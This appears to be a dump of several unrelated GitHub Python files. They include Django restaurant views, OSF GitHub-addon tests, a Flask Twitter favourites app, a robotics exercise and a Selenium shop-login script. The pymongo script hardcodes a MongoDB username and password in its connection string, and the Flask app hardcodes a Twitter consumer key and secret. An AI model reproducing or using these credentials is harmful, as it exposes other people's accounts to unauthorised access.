user_profile,\n \"restaurant\": restaurant,\n }\n return render(request, \"core/restaurant_profile.html\", context)\n\n\nclass RestaurantDetailView(DetailView):\n model = Restaurant\n template_name = \"core/restaurant_detail.html\"\n context_object_name = \"restaurant\"\n\n def get_object(self):\n restaurant = get_object_or_404(\n Restaurant, restaurant_slug=self.kwargs.get(\"restaurant_slug\")\n )\n return restaurant\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"categories\"] = Category.objects.filter(\n restaurant=self.get_object()\n ).prefetch_related(\n Prefetch(\"food_items\", queryset=FoodItem.objects.filter(is_available=True))\n )\n context[\"opening_hours\"] = OpeningHour.objects.filter(\n restaurant=self.get_object()\n )\n today_date = date.today()\n today = today_date.isoweekday()\n context[\"current_opening_hours\"] = OpeningHour.objects.filter(\n restaurant=self.get_object(), day=today\n )\n\n try:\n context[\"cart_items\"] = Cart.objects.filter(\n user=self.request.user,\n )\n except:\n context[\"cart_items\"] = []\n return context\n\n\nclass SearchView(View):\n def get(self, request, *args, **kwargs):\n if \"address\" not in request.GET:\n return redirect(\"core:restaurant_list\")\n else:\n keyword = request.GET.get(\"keyword\")\n user_address = request.GET.get(\"address\")\n latitude = request.GET.get(\"lat\")\n longitude = request.GET.get(\"lng\")\n radius = request.GET.get(\"radius\")\n\n food_items = FoodItem.objects.filter(\n food_title__icontains=keyword, is_available=True\n )\n restaurants_ids = food_items.values_list(\"restaurant\", flat=True)\n restaurant_list = Restaurant.objects.filter(\n Q(id__in=restaurants_ids)\n | Q(\n restaurant_name__icontains=keyword,\n is_approved=True,\n user__is_active=True,\n )\n )\n if latitude and longitude and radius:\n pnt = GEOSGeometry(f\"POINT({longitude} {latitude})\", srid=4326)\n restaurant_list = (\n Restaurant.objects.filter(\n Q(id__in=restaurants_ids)\n | Q(\n restaurant_name__icontains=keyword,\n is_approved=True,\n user__is_active=True,\n ),\n user_profile__location__distance_lte=(pnt, D(km=radius)),\n )\n .annotate(distance=Distance(\"user_profile__location\", pnt))\n .order_by(\"distance\")\n )\n\n for restaurant in restaurant_list:\n restaurant.kms = round(restaurant.distance.km, 1)\n\n context = {\"restaurant_list\": restaurant_list, \"user_address\": user_address}\n return render(request, \"core/restaurant_list.html\", context)\n\n\nclass OpeningHoursView(LoginRequiredMixin, View):\n def get(self, request, *args, **kwargs):\n opening_hours = OpeningHour.objects.filter(restaurant=get_restaurant(request))\n form = OpeningHourForm\n context = {\"form\": form, \"opening_hours\": opening_hours}\n return render(request, \"core/opening_hours.html\", context)\n\n\nclass AddOpeningHourView(LoginRequiredMixin, View):\n def post(self, request, *args, **kwargs):\n if request.headers.get(\"x-requested-with\") == \"XMLHttpRequest\":\n day = request.POST.get(\"day\")\n from_hour = request.POST.get(\"from_hour\")\n to_hour = request.POST.get(\"to_hour\")\n is_closed = request.POST.get(\"is_closed\")\n try:\n opening_hour = OpeningHour.objects.create(\n restaurant=get_restaurant(request),\n day=day,\n from_hour=from_hour,\n to_hour=to_hour,\n is_closed=is_closed,\n )\n if opening_hour:\n day = OpeningHour.objects.get(id=opening_hour.id)\n if day.is_closed:\n return JsonResponse(\n {\n \"status\": \"Success\",\n \"id\": opening_hour.id,\n \"day\": day.get_day_display(),\n \"is_closed\": \"Closed\",\n }\n )\n else:\n return JsonResponse(\n {\n \"status\": \"Success\",\n \"id\": opening_hour.id,\n \"day\": day.get_day_display(),\n \"from_hour\": day.from_hour,\n \"to_hour\": day.to_hour,\n }\n )\n except IntegrityError as e:\n return JsonResponse(\n {\n \"status\": \"Failed\",\n \"message\": f\"{from_hour} to {to_hour} already exists for this day!\",\n }\n )\n else:\n HttpResponse(\"Invalid Request\")\n\n\nclass RemoveOpeningHourView(LoginRequiredMixin, View):\n def get(self, request, *args, **kwargs):\n if request.headers.get(\"x-requested-with\") == \"XMLHttpRequest\":\n hour_id = self.kwargs.get(\"hour_id\")\n hour = get_object_or_404(OpeningHour, id=hour_id)\n hour.delete()\n return JsonResponse({\"status\": \"Success\", \"id\": hour_id})\n\n\nclass CustomerProfileView(LoginRequiredMixin, View):\n def get(self, request, *args, **kwargs):\n user_profile = get_object_or_404(UserProfile, user=request.user)\n form = UserInfoForm(instance=request.user)\n up_form = UserProfileForm(instance=user_profile)\n context = {\"form\": form, \"up_form\": up_form, \"user_profile\": user_profile}\n return render(request, \"core/customer_profile.html\", context)\n\n def post(self, request, *args, **kwargs):\n user_profile = get_object_or_404(UserProfile, user=request.user)\n form = UserInfoForm(request.POST, instance=request.user)\n up_form = UserProfileForm(request.POST, request.FILES, instance=user_profile)\n if form.is_valid() and up_form.is_valid():\n form.save()\n up_form.save()\n messages.success(request, \"Your profile was updated successfully!\")\n return redirect(\"accounts:dashboard\")\n else:\n messages.error(request, \"There was a problem updating your profile\")\n context = {\"form\": form, \"up_form\": up_form, \"user_profile\": user_profile}\n return render(request, \"core/customer_profile.html\", context)\n\n\nclass CheckoutView(LoginRequiredMixin, View):\n def get(self, request, *args, **kwargs):\n cart_items = Cart.objects.filter(user=request.user)\n if cart_items.count() < 1:\n return redirect(\"core:restaurant_list\")\n user_profile = UserProfile.objects.get(user=request.user)\n\n default_values = {\n \"first_name\": request.user.first_name,\n \"last_name\": request.user.last_name,\n \"email\": request.user.email,\n \"address\": user_profile.address,\n \"phone_no\": request.user.phone_no,\n \"city\": user_profile.city,\n \"state\": user_profile.state,\n \"country\": user_profile.country,\n \"pin_code\": user_profile.pin_code,\n }\n form = CheckoutForm(initial=default_values)\n context = {\"form\": form, \"cart_items\": cart_items}\n return render(request, \"core/checkout.html\", context)\n\n\nclass RestaurantOrdersView(LoginRequiredMixin, View):\n def get(self, request, *args, **kwargs):\n restaurant = Restaurant.objects.get(user=request.user)\n orders = Order.objects.filter(restaurants__in=[restaurant.id], is_ordered=True)\n context = {\"orders\": orders}\n return render(request, \"core/restaurant_orders.html\", context)\n","repo_name":"Sheharyar123/Restaurant-Website","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29972584534","text":"\nfrom roblib import * # available at https://www.ensta-bretagne.fr/jaulin/roblib.py\n\ndef f(x,u):\n x=x.flatten()\n u=u.flatten()\n return (array([[x[3]*cos(x[2])], [x[3]*sin(x[2])], [u[0]],[u[1]]]))\n \n \n \ndef control(x,w,dw,ddw):\n u=array([[0],[0]]) #TO DO\n return u \n\n\nax=init_figure(-30,30,-30,30)\ndt = 0.02\nx = array([[10],[0],[1],[1]])\nu = array([[1],[1]])\nL=10\ns = arange(0,2*pi,0.01)\nfor t in arange(0,10,dt) :\n clear(ax)\n plot(L*cos(s), L*sin(3*s),color='magenta')\n draw_tank(x,'red') \n w=array([[0],[0]]) #TO DO\n dw=array([[0],[0]]) #TO DO\n ddw=array([[0],[0]]) #TO DO\n u=control(x,w,dw,ddw)\n draw_disk(w,0.5,ax,\"red\") \n x = x + dt*f(x,u)\n\n\n\n\n \n\n \n\n\n\n \n \n \n\n","repo_name":"CoralieEscande/Exercices2Moocs","sub_path":"RobMooc/Programmes de démarrage pour les utilisateurs de Python/2.08__sliding.py","file_name":"2.08__sliding.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17006480672","text":"import pymongo\n\nclient = pymongo.MongoClient(\"mongodb://lohith369:Mongo369@ac-qn6cw65-shard-00-00.onq988i.mongodb.net:27017,ac-qn6cw65-shard-00-01.onq988i.mongodb.net:27017,ac-qn6cw65-shard-00-02.onq988i.mongodb.net:27017/?ssl=true&replicaSet=atlas-vkjq5c-shard-0&authSource=admin&retryWrites=true&w=majority\")\ndb = client.test\nprint(db)\n\nd = {\n \"Name\" : \"Lohith\",\n \"Age\" : 30,\n \"Email\" : \"lohith@gmail.com\",\n \"Address\" : \"bangalore\"\n}\n\nd = {\n \"Name\" : \"Lohith\",\n \"Age\" : 30,\n \"Email\" : \"lohith@gmail.com\",\n \"Address\" : \"bangalore\"\n}\n\nd = {\n \"Name\" : \"Lohith\",\n \"Age\" : 30,\n \"Email\" : \"lohith@gmail.com\",\n \"Address\" : \"bangalore\"\n}\ndb1 = client['mongggtest']\ncollection = db1['test']\ncollection.insert_one(d)","repo_name":"Lohithkc/mongotest","sub_path":"Testdb.py","file_name":"Testdb.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2017362090","text":"from typing import Callable, Dict, Optional, Union\nimport numpy as np\nfrom gensim.test.utils import common_texts\nfrom gensim.models.doc2vec import Doc2Vec, TaggedDocument\nfrom sentence_transformers import SentenceTransformer\nfrom sklearn.decomposition import PCA, TruncatedSVD\nfrom scipy import stats\n\nfrom base import detectorParent\nfrom baseModels import baseModels \nfrom sampling import samplingData\n\nclass embedding(samplingData, detectorParent):\n def __init__(self, *args, **kwargs):\n \"\"\"\n In this class, we turn the samples of text inputs into text embeddings, which we can then use\n to a) either construct distributions, or b) calculate drift on. There are many different kinds \n of text embeddings and encodings. In this class, we cover 3 umbrella embeddings (discussed below)\n \n Returns\n ---------- \n A dictionary containing the embeddings as decided by the choice of embedding model and drift detection test type\n \"\"\"\n super(embedding, self).__init__(*args, **kwargs)\n \n def sampleData(self):\n \"\"\"\n Call the samplingData class to construct samples from the input data provided by the user\n\n Returns\n ---------- \n Dictionary with samples for reference and comparison data (or streams of comparison data).\n \"\"\"\n if self.sample_dict is None:\n return samplingData.samples(self)\n else:\n return self.sample_dict\n \n def embed_data(self):\n \"\"\"\n Embeds text inherited from the sampling class. The type of embedding (Doc2Vec, SBERT etc) is\n decided by the user\n\n Returns\n ---------- \n A dictionary containing the embeddings as decided by the choice of embedding model and drift detection test type\n \"\"\"\n sample_dict = self.sampleData()\n data_ref = sample_dict[0]\n \n # need to look into what sort of data to inlude in tagged documents (for now just the first X text pieces)\n bases = baseModels(data = data_ref[:self.sample_size], sample_size = self.sample_size, \n SBERT_model = self.SBERT_model)\n emb_dict = {}\n\n if self.embedding_model == \"Doc2Vec\":\n model = bases.doc2vec_base()\n for i in range(len(sample_dict)):\n emb_dict[i] = model.infer_vector(sample_dict[i])\n elif self.embedding_model == \"SBERT\":\n model = bases.sbert_base()\n for i in range(len(sample_dict)):\n emb_dict[i] = model.encode(sample_dict[i])\n elif self.embedding_model == \"USE\":\n model = bases.use_base()\n for i in range(len(sample_dict)):\n emb_dict[i] = np.array(model(sample_dict[i]))\n else:\n print(\"The model is not defined\")\n return emb_dict \n \n # only required for KS Test (which does not get to Distributions which is where we actually do iterations)\n def embed_data_iters(self):\n \"\"\"\n Runs the embedding function \"iterations\" number of times, if the selected drift detection test\n is the KS Test. For KL and JS Divergence, the iterations are taken care of in the distributions\n class\n \n Returns\n ---------- \n A dictionary containing the embeddings as decided by the choice of embedding model and drift detection test type\n \"\"\"\n emb_dict = {}\n for i in range(self.iterations):\n temp_dict = self.embed_data()\n emb_dict[i] = temp_dict\n return emb_dict\n\n # constructed with SBERT in mind\n def dim_reduction(self,\n emb_dict: Optional[dict] = None,\n components: Optional[int] = 25,\n n_iters: Optional[int] = 7):\n \"\"\"\n Embeds text inherited from the sampling class.\n\n Args\n ---------- \n emb_dict: dictionary\n Dictionary of embeddings as returned by the embed_data method\n component: int (optional)\n The number top components we want from PCA or SVD\n n_iters: int\n\n Returns\n ---------- \n a dictionary containing the embeddings as decided by the choice of embedding model and \n drift detection test type\n \"\"\"\n\n emb_dict = self.embed_data()\n if self.transformation == \"PCA\":\n model = PCA(n_components=components)\n elif self.transformation == \"SVD\":\n model = TruncatedSVD(n_components=components, n_iter= n_iters, random_state=42)\n else: \n print(\"The following dimension reudction technique is not yet supported\")\n '''\n Doc2Vec is a little more complicated so we will skip dim-reduction with it for now\n '''\n # only looking at the first iteration for now\n final_dict = {}\n for window in range(len(emb_dict)):\n model.fit(emb_dict[window].T)\n final_data = np.asarray(model.components_).T\n final_dict[window] = final_data\n return final_dict\n \n def final_embeddings(self):\n \"\"\"\n Returns\n ---------- \n a dictionary containing the embeddings as decided by the choice of embedding model and \n drift detection test type\n \"\"\"\n if self.embedding_model == \"Doc2Vec\":\n if self.test == \"KS\":\n return self.embed_data_iters()\n elif self.test in [\"KL\", \"JS\"]:\n return self.embed_data()\n else:\n print(\"This test is not included in the package as yet\")\n elif self.embedding_model in [\"SBERT\", \"USE\"]:\n if self.transformation is None:\n return self.embed_data()\n else:\n return self.dim_reduction()\n else:\n print(\"This embedding is not part of the package as yet.\")\n","repo_name":"akshitasingh0706/NaturallyDrifted","sub_path":"src/featureLevelDetectors/embedding.py","file_name":"embedding.py","file_ext":"py","file_size_in_byte":5902,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"35592801643","text":"from pathlib import Path\nimport sqlite3\nimport pandas as pd\n\n# Create a sqlite db\nPath('my_data.db').touch()\n\n# create sqlit connection\nconn = sqlite3.connect('my_data.db')\nc = conn.cursor()\n\n# load data to db\ncategories = pd.read_csv('data/BigSupplyCo_Categories.csv')\ncategories.to_sql('categories', conn, index=False)\n\ncustomers = pd.read_csv('data/BigSupplyCo_Customers.csv')\ncustomers.to_sql('customers', conn, index=False)\n\ndepartments = pd.read_csv('data/BigSupplyCo_Departments.csv')\ndepartments.to_sql('departments', conn, index=False)\n\norders = pd.read_csv('data/BigSupplyCo_Orders.csv', encoding='latin-1')\norders.to_sql('orders', conn, index=False)\n\nproducts = pd.read_csv('data/BigSupplyCo_Products.csv')\nproducts.to_sql('products', conn, index=False)","repo_name":"Hoomaaan/RetailStore-Chatbot","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14150308567","text":"# -*- coding: utf-8 -*-\nimport httplib as http\nimport mock\nfrom nose.tools import assert_equal, assert_false\nimport pytest\nimport unittest\n\nfrom tests.base import OsfTestCase, get_default_metaschema\nfrom osf_tests.factories import ProjectFactory, UserFactory, AuthUserFactory\n\nfrom github3.repos.branch import Branch\n\nfrom framework.auth import Auth\n\nfrom addons.base.tests.views import (\n OAuthAddonAuthViewsTestCaseMixin, OAuthAddonConfigViewsTestCaseMixin\n)\nfrom addons.github.tests.utils import create_mock_github, GitHubAddonTestCase\nfrom addons.github.tests.factories import GitHubAccountFactory\n\nfrom addons.github import utils\nfrom addons.github.api import GitHubClient\nfrom addons.github.serializer import GitHubSerializer\n\npytestmark = pytest.mark.django_db\n\n\nclass TestGitHubAuthViews(GitHubAddonTestCase, OAuthAddonAuthViewsTestCaseMixin, OsfTestCase):\n\n @mock.patch(\n 'addons.github.models.UserSettings.revoke_remote_oauth_access',\n mock.PropertyMock()\n )\n def test_delete_external_account(self):\n super(TestGitHubAuthViews, self).test_delete_external_account()\n\n\nclass TestGitHubConfigViews(GitHubAddonTestCase, OAuthAddonConfigViewsTestCaseMixin, OsfTestCase):\n folder = None\n Serializer = GitHubSerializer\n client = GitHubClient\n\n ## Overrides ##\n\n def setUp(self):\n super(TestGitHubConfigViews, self).setUp()\n self.mock_api_user = mock.patch('addons.github.api.GitHubClient.user')\n self.mock_api_user.return_value = mock.Mock()\n self.mock_api_user.start()\n\n def tearDown(self):\n self.mock_api_user.stop()\n super(TestGitHubConfigViews, self).tearDown()\n\n def test_folder_list(self):\n # GH only lists root folder (repos), this test is superfluous\n pass\n\n @mock.patch('addons.github.models.NodeSettings.add_hook')\n @mock.patch('addons.github.views.GitHubClient.repo')\n def test_set_config(self, mock_repo, mock_add_hook):\n # GH selects repos, not folders, so this needs to be overriden\n mock_repo.return_value = 'repo_name'\n url = self.project.api_url_for('{0}_set_config'.format(self.ADDON_SHORT_NAME))\n res = self.app.post_json(url, {\n 'github_user': 'octocat',\n 'github_repo': 'repo_name',\n }, auth=self.user.auth)\n assert_equal(res.status_code, http.OK)\n self.project.reload()\n assert_equal(\n self.project.logs.latest().action,\n '{0}_repo_linked'.format(self.ADDON_SHORT_NAME)\n )\n mock_add_hook.assert_called_once()\n\n\n# TODO: Test remaining CRUD methods\n# TODO: Test exception handling\nclass TestCRUD(OsfTestCase):\n\n def setUp(self):\n super(TestCRUD, self).setUp()\n self.github = create_mock_github(user='fred', private=False)\n self.user = AuthUserFactory()\n self.consolidated_auth = Auth(user=self.user)\n self.project = ProjectFactory(creator=self.user)\n self.project.add_addon('github', auth=self.consolidated_auth)\n self.project.creator.add_addon('github')\n self.node_settings = self.project.get_addon('github')\n self.node_settings.user_settings = self.project.creator.get_addon('github')\n # Set the node addon settings to correspond to the values of the mock repo\n self.node_settings.user = self.github.repo.return_value.owner.login\n self.node_settings.repo = self.github.repo.return_value.name\n self.node_settings.save()\n\n\nclass TestGithubViews(OsfTestCase):\n\n def setUp(self):\n super(TestGithubViews, self).setUp()\n self.user = AuthUserFactory()\n self.consolidated_auth = Auth(user=self.user)\n\n self.project = ProjectFactory(creator=self.user)\n self.non_authenticator = UserFactory()\n self.project.add_contributor(\n contributor=self.non_authenticator,\n auth=self.consolidated_auth,\n )\n self.project.creator.add_addon('github')\n self.project.creator.external_accounts.add(GitHubAccountFactory())\n self.project.creator.save()\n self.project.save()\n self.project.add_addon('github', auth=self.consolidated_auth)\n\n self.github = create_mock_github(user='fred', private=False)\n\n self.node_settings = self.project.get_addon('github')\n self.node_settings.user_settings = self.project.creator.get_addon('github')\n # Set the node addon settings to correspond to the values of the mock repo\n self.node_settings.user = self.github.repo.return_value.owner.login\n self.node_settings.repo = self.github.repo.return_value.name\n self.node_settings.save()\n\n def _get_sha_for_branch(self, branch=None, mock_branches=None):\n github_mock = self.github\n if mock_branches is None:\n mock_branches = github_mock.branches\n if branch is None: # Get default branch name\n branch = self.github.repo.return_value.default_branch\n for each in mock_branches.return_value:\n if each.name == branch:\n branch_sha = each.commit.sha\n return branch_sha\n\n # Tests for _get_refs\n @mock.patch('addons.github.api.GitHubClient.branches')\n @mock.patch('addons.github.api.GitHubClient.repo')\n def test_get_refs_defaults(self, mock_repo, mock_branches):\n github_mock = self.github\n mock_repo.return_value = github_mock.repo.return_value\n mock_branches.return_value = github_mock.branches.return_value\n branch, sha, branches = utils.get_refs(self.node_settings)\n\n\nclass TestRegistrationsWithGithub(OsfTestCase):\n\n def setUp(self):\n\n super(TestRegistrationsWithGithub, self).setUp()\n self.project = ProjectFactory()\n self.consolidated_auth = Auth(user=self.project.creator)\n\n self.project.add_addon('github', auth=self.consolidated_auth)\n self.project.creator.add_addon('github')\n self.node_settings = self.project.get_addon('github')\n self.user_settings = self.project.creator.get_addon('github')\n self.node_settings.user_settings = self.user_settings\n self.node_settings.user = 'Queen'\n self.node_settings.repo = 'Sheer-Heart-Attack'\n self.node_settings.save()\n\n\nclass TestGithubSettings(OsfTestCase):\n\n def setUp(self):\n\n super(TestGithubSettings, self).setUp()\n self.github = create_mock_github(user='fred', private=False)\n self.project = ProjectFactory()\n self.auth = self.project.creator.auth\n self.consolidated_auth = Auth(user=self.project.creator)\n\n self.project.add_addon('github', auth=self.consolidated_auth)\n self.project.creator.add_addon('github')\n self.node_settings = self.project.get_addon('github')\n self.user_settings = self.project.creator.get_addon('github')\n self.node_settings.user_settings = self.user_settings\n self.node_settings.user = 'Queen'\n self.node_settings.repo = 'Sheer-Heart-Attack'\n self.node_settings.save()\n\n @mock.patch('addons.github.models.NodeSettings.add_hook')\n @mock.patch('addons.github.api.GitHubClient.repo')\n def test_link_repo(self, mock_repo, mock_add_hook):\n github_mock = self.github\n mock_repo.return_value = github_mock.repo.return_value\n\n url = self.project.api_url + 'github/settings/'\n self.app.post_json(\n url,\n {\n 'github_user': 'queen',\n 'github_repo': 'night at the opera',\n },\n auth=self.auth\n ).maybe_follow()\n\n self.project.reload()\n self.node_settings.reload()\n\n assert_equal(self.node_settings.user, 'queen')\n assert_equal(self.node_settings.repo, 'night at the opera')\n assert_equal(self.project.logs.latest().action, 'github_repo_linked')\n mock_add_hook.assert_called_once()\n\n @mock.patch('addons.github.models.NodeSettings.add_hook')\n @mock.patch('addons.github.api.GitHubClient.repo')\n def test_link_repo_no_change(self, mock_repo, mock_add_hook):\n github_mock = self.github\n mock_repo.return_value = github_mock.repo.return_value\n\n log_count = self.project.logs.count()\n\n url = self.project.api_url + 'github/settings/'\n self.app.post_json(\n url,\n {\n 'github_user': 'Queen',\n 'github_repo': 'Sheer-Heart-Attack',\n },\n auth=self.auth\n ).maybe_follow()\n\n self.project.reload()\n self.node_settings.reload()\n\n assert_equal(self.project.logs.count(), log_count)\n assert_false(mock_add_hook.called)\n\n @mock.patch('addons.github.api.GitHubClient.repo')\n def test_link_repo_non_existent(self, mock_repo):\n\n mock_repo.return_value = None\n\n url = self.project.api_url + 'github/settings/'\n res = self.app.post_json(\n url,\n {\n 'github_user': 'queen',\n 'github_repo': 'night at the opera',\n },\n auth=self.auth,\n expect_errors=True\n ).maybe_follow()\n\n assert_equal(res.status_code, 400)\n\n @mock.patch('addons.github.api.GitHubClient.branches')\n def test_link_repo_registration(self, mock_branches):\n\n mock_branches.return_value = [\n Branch.from_json({\n 'name': 'master',\n 'commit': {\n 'sha': '6dcb09b5b57875f334f61aebed695e2e4193db5e',\n 'url': 'https://api.github.com/repos/octocat/Hello-World/commits/c5b97d5ae6c19d5c5df71a34c7fbeeda2479ccbc',\n }\n }),\n Branch.from_json({\n 'name': 'develop',\n 'commit': {\n 'sha': '6dcb09b5b57875asdasedawedawedwedaewdwdass',\n 'url': 'https://api.github.com/repos/octocat/Hello-World/commits/cdcb09b5b57875asdasedawedawedwedaewdwdass',\n }\n })\n ]\n\n registration = self.project.register_node(\n schema=get_default_metaschema(),\n auth=self.consolidated_auth,\n data=''\n )\n\n url = registration.api_url + 'github/settings/'\n res = self.app.post_json(\n url,\n {\n 'github_user': 'queen',\n 'github_repo': 'night at the opera',\n },\n auth=self.auth,\n expect_errors=True\n ).maybe_follow()\n\n assert_equal(res.status_code, 400)\n\n @mock.patch('addons.github.models.NodeSettings.delete_hook')\n def test_deauthorize(self, mock_delete_hook):\n\n url = self.project.api_url + 'github/user_auth/'\n\n self.app.delete(url, auth=self.auth).maybe_follow()\n\n self.project.reload()\n self.node_settings.reload()\n assert_equal(self.node_settings.user, None)\n assert_equal(self.node_settings.repo, None)\n assert_equal(self.node_settings.user_settings, None)\n\n assert_equal(self.project.logs.latest().action, 'github_node_deauthorized')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Rheisen/osf.io","sub_path":"addons/github/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":11094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"3198368928","text":"# -*- coding: utf-8 -*-\nimport tweepy\nimport datetime\nimport logging\nimport sys\nimport json\nimport os\nimport requests\nimport webbrowser\nfrom time import sleep\nfrom flask import Flask, session, redirect, render_template, request\n\n# Keys\nCK = 'wOEXhlK7izfzBN40d6kzFfk6F'\nCS = 'wyvYrU0XVsLJjrXTVYuVqIVenXuMkXf4AHZ3q6Nuz4v4BXc94g'\nauth = tweepy.OAuthHandler(CK, CS)\n# 読み込むTweet数 max:200\ncount = 200\n\n#\nverifier = None\ntaco = None\n\n# 画像の保存先ディレクトリ\nIMAGES_DIR = 'path'\n\n# Flask設定\napp = Flask(__name__)\napp.secret_key = os.urandom(24)\n\napi = tweepy.API(auth)\n\n# ルートへのアクセス\n@app.route('/', methods=['GET'])\ndef main():\n redirect_url = auth.get_authorization_url()\n session['request_token'] = auth.request_token\n return redirect(redirect_url)\n\n# /likesへのアクセス\n@app.route('/likes')\ndef likes():\n global verifier\n if verifier is None:\n token = session.pop('request_token', None)\n verifier = request.args.get('oauth_verifier')\n auth.request_token = token\n auth.get_access_token(verifier)\n session.pop('oauth_verifier', None)\n verifier = None\n\n fav = api.favorites(count = count)\n return render_template('likes.html', fav=fav)\n\n# /likedへのアクセス\n@app.route('/liked', methods=['POST'])\ndef liked():\n global taco\n taco = request.form['taco']\n fav = api.favorites(taco, count = count)\n return render_template('likes.html', taco=taco, fav=fav)\n\n# /likeへのアクセス\n@app.route('/like')\ndef like():\n id = request.args.get('id')\n api.create_favorite(id)\n return redirect('javascript:history.go(-1)')\n\n# /retweetへのアクセス\n@app.route('/retweet')\ndef retweet():\n id = request.args.get('id')\n api.retweet(id)\n return redirect('javascript:history.go(-1)')\n\n# Saveボタン\n@app.route('/save')\ndef index2():\n global taco\n fav = api.favorites(taco, count = count)\n for result in fav:\n # Twitter ID\n screen_name = result.user.screen_name\n # ツイート日時\n jst = result.created_at + datetime.timedelta(hours=9)\n time_str = jst.strftime('%Y-%m%d-%H%M%S')\n # 画像付きか\n if 'media' in result.entities:\n # 画像保存\n i = 0\n for media in result.extended_entities['media']:\n url = media['media_url_https']\n i += 1\n filename = IMAGES_DIR + time_str + '_' + screen_name + str(i) + '.' + url.split('.')[-1]\n\n # :origサイズで画像をダウンロード\n res = requests.get(url+ ':orig')\n with open(os.path.join(filename), 'wb') as fp:\n fp.write(res.content)\n return redirect('/liked')\n\n# webサーバ起動\nif __name__ == '__main__':\n app.run(debug = False)\n","repo_name":"awzhak/Twipic","sub_path":"twiapp.py","file_name":"twiapp.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7841664075","text":"from id3 import run\n\nchosen = int(input(\"Qual teste deseja realizar?\\n[1] para weather.csv\\n[2] para restaurant.csv\\n[3] para iris.csv\\n\"))\nif(chosen == 1):\n run('weather')\nelif(chosen == 2):\n run('restaurant')\nelse:\n run('iris')\n ","repo_name":"MatheusRodriguesBezerra/InteligenciaArtificial","sub_path":"trabalho3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6020458760","text":"import time\n\nfrom selenium import webdriver\nfrom selenium.webdriver import ActionChains\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\ndriver = webdriver.Chrome()\n\n\ntry:\n # Открываем сайт\n driver.get(\"https://shop.foodsoul.pro/\")\n\n # Нажать самовывоз\n pickup = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located(\n (By.XPATH, \"/html/body/div[4]/div/div/div/ul/li[2]\")\n )\n )\n pickup.click()\n print('Нажал \"Самовывоз\"')\n\n # Нажать первый ТЦ\n shop_cent = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located(\n (\n By.XPATH,\n \"/html/body/div[4]/div/div/div/div[2]/div[1]/div/div[1]/div[2]/div/div/div/ul/li[1]\",\n )\n )\n )\n shop_cent.click()\n print('Нажал \"ТЦ\"')\n\n # Нажать кнопку аккаунта\n account = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located(\n (\n By.CSS_SELECTOR,\n \"#topBar > div > div > div.topbar__menu > div > div > div.popover__relative > button\",\n )\n )\n )\n account.click()\n print('Нажал \"Аккаунт\"')\n\n # Нажать кнопку \"telegram\"\n telegram = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located(\n (\n By.CSS_SELECTOR,\n \"#topBar > div > div > div.topbar__menu > div > div > div.popover__content > form > \"\n \"div.login-ways > div > \"\n \"button.button.position-relative.d-inline-flex.align-items-center.overflow-hidden.outline\"\n \"-none.cursor-pointer.us-none.button--default.button--large.button--custom.button\"\n \"--uppercase.button--expanded > div\",\n )\n )\n )\n telegram.click()\n print('Нажал \"Telegram\"')\n\n # Капча\n while True:\n try:\n WebDriverWait(driver, 7).until(\n EC.presence_of_element_located(\n (By.XPATH, \"/html/body/div[4]/div[2]/iframe\")\n )\n )\n\n input('Встретилась капча, пройдите её, затем нажмите \"Enter\" ')\n\n # Нажать кнопку \"telegram\"\n telegram = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located(\n (\n By.CSS_SELECTOR,\n \"#topBar > div > div > div.topbar__menu > div > div > div.popover__content > form > \"\n \"div.login-ways > div > \"\n \"button.button.position-relative.d-inline-flex.align-items-center.overflow-hidden\"\n \".outline\"\n \"-none.cursor-pointer.us-none.button--default.button--large.button--custom.button\"\n \"--uppercase.button--expanded\",\n )\n )\n )\n telegram.click()\n print('Нажал \"Telegram\"')\n break\n\n except Exception as ex:\n print(\"Капча не найдена\")\n break\n\n # Нажать кнопку \"открыть\"\n butt_open = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located(\n (\n By.CSS_SELECTOR,\n \"#topBar > div > div > div.topbar__menu > div > div > div.popover__content > div > a\",\n )\n )\n )\n butt_open.click()\n print('Нажал \"Открыть\"')\n\n # Пользователь вручную выполняет авторизацию через telegram\n input(\n \"Авторизуйтесь через телеграмм, убедитесь, что вошли в аккаунт, затем нажмите Enter \"\n )\n\n # Прокрутка страницы к меню ресторана\n iframe = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located(\n (\n By.CSS_SELECTOR,\n \"#recommendrecommend > div > div:nth-child(1) > div.product__wrapper > div.product-menu > \"\n \"div.product-actions > button > div\",\n )\n )\n )\n ActionChains(driver).scroll_to_element(iframe).perform()\n print(\"прокрутил к элементу\")\n\n # Добавление товара в корзину\n product_add = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located(\n (\n By.CSS_SELECTOR,\n \"#recommendrecommend > div > div:nth-child(1) > div.product__wrapper > div.product-menu > \"\n \"div.product-actions > button > div\",\n )\n )\n )\n product_add.click()\n print(\"кликнул на добавить в корзину\")\n\n # Нажать кнопку корзины\n basket = WebDriverWait(driver, 